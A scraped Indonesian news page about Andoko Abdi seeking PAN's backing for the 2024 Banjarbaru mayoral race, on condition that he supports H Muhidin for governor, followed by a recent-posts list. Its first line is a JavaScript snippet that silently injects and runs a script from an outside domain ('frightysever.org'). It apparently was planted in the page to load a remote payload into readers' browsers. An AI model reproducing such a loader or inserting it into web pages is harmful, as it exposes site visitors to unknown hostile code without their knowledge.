(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Abdi Dekati PAN, Emi: Harus Komitmen Menangkan H Muhidin di Pilgub Kalsel


KANALKALIMANTAN.COM, BANJARBARU – Lawatan politik Andoko Abdi mencari partai politik pengusung terus dilakukan. Giliran ke DPD Partai Amanat Nasional (PAN) Banjarbaru, Minggu (26/5/2024) siang.

Kader Partai Demokrat Banjarbaru ini datang untuk menyerahkan formulir pendaftaran untuk kontestasi dalam Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarbaru 2024.

Mas Abdi -biasa disapa- mengaku siap memenangkan apa yang menjadi tujuan dari koalisi partai yang akan dijalin nanti.

Baca juga: Pasangan Calon Belum Pasti, Aditya: Titik Akhirnya SK Partai

“Sementara ini Demokrat dan PAN masih satu koalisi di provinsi, maka hal yang bagus untuk kita nanti bisa koalisi di Kota Banjarbaru,” ujar Andoko Abdi kepada awak media, Minggu (26/5/2024) siang.

“Siap pada dasarnya karena kita satu koalisi, tentu kita sebagai kader partai akan memenangkan tujuan dari koalisi tersebut,” jelas dia.

Sementara itu, Ketua DPD PAN Banjarbaru, Emi Lasari mengapresiasi langkah orang muda di Banjarbaru yang berani maju bertarung di kontestasi Pilkada 2024.

“Kita sangat mengapresiasi dan mendukung adanya tokoh muda di Banjarbaru yang berani bertarung di Pilkada 2024, walaupun baru tahap awal untuk menjalin komunikasi dengan parpol-parpol,” ungkap Emi Lasari.

Dirinya menjelaskan ke semua calon yang mendaftar diberikan persyaratan untuk berkomitmen memenangkan kader Pilgub Kalsel yakni H Muhidin, jika koalisi sudah ditetapkan.

Baca juga: Kontestasi Pilwali Banjarbaru, Golkar Partai Pertama Incaran Lisa Halaby

“Mas Abdi memberikan komitmen untuk itu sehingga menjadi satu catatan bagi kami yang akan kami record menjadi satu pertimbangan kita dalam menentukan dukungan arah mana Pilkada Banjarbaru,” jelas dia.

Tak hanya syarat dukungan koalisi, pertimbangan calon kepala daerah juga dilihat PAN melalui hasil survei, elektabilitas serta kesiapan petarungnya itu sendiri.

Ketua DPC Partai Demokrat, Said Subari mengatakan harapan berkoalisi dari hasil komunikasi Demokrat bersama PAN sangat besar.

Baca juga: 657 Anggota PPS se Kabupaten HSU Dilantik untuk Pilkada 2024

“Karena bu Emi banyak memberikan saran dan masukan kepada petarung kita, mudah-mudahan dengan komunikasi selama ini bisa saling mendukung untuk kemenangan,” ujar Said Subari.

Andoko Abdi juga sudah melakukan lawatan politik ke sejumlah partai seperti PKS, Partai Golkar, Partai Nasdem, dan PKB untuk mengembalikan berkas formulir pendaftaran.

“Endingnya kemana, setelah ini kita diskusikan termasuk soal pasangan sedang dikomunikasikan semua calon yang ada di Banjarbaru,” tuntasnya. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Tinggalkan Plastik, Bakul Purun Jadi Wadah Daging Kurban di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Penyelenggaraan ibadah kurban Iduladha 1445 Hijriah di Banjarbaru menerapkan sistem ramah lingkungan.… Read More

2 jam ago

Panitia Kurban Masjid Hajjah Nuriah Banjarbaru Sembelih 14 Ekor Sapi

KANALKALIMANTAN.COM, BANJARBARU - Momen ibadah kurban Iduladha 1445 hijriah menjadi ajang silaturahim dan gotong royong… Read More

4 jam ago

Jemaah Haji Asal Tabalong Wafat Jelang Wukuf Arafah

KANALKALIMANTAN.COM, BANJARMASIN - Kabar duka datang dari Kloter 18 Haji Embarkasi Banjarmasin, seorang jemaah haji… Read More

21 jam ago

Harga Daging Sapi Stabil di Pasar Bauntung Banjarbaru, Ayam Ras Naik Capai Rp31 Ribu per Kg

KANALKALIMANTAN.COM, BANJARBARU - Lapak penjual daging sapi di Pasar Bauntung Kota Banjarbaru Kalimantan Selatan (Kalsel)… Read More

1 hari ago

Kerukunan Mahasiswa HSU Banjarmasin Dikukuhkan, Ini Pesan Ketua DPRD HSU

KANALKALIMANTAN.COM, AMUNTAI - Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Hulu Sungai Utara (HSU) selalu memberikan… Read More

1 hari ago

203 Jemaah Sidrap Ditangkap di Jeddah, Pakai Visa Ziarah Bertahan untuk Berhaji

KANALKALIMANTAN.COM, JEDDAH - Tim Pengawas (Timwas) Haji DPR meminta jemaah calon haji Indonesia yang tidak… Read More

1 hari ago

This website uses cookies.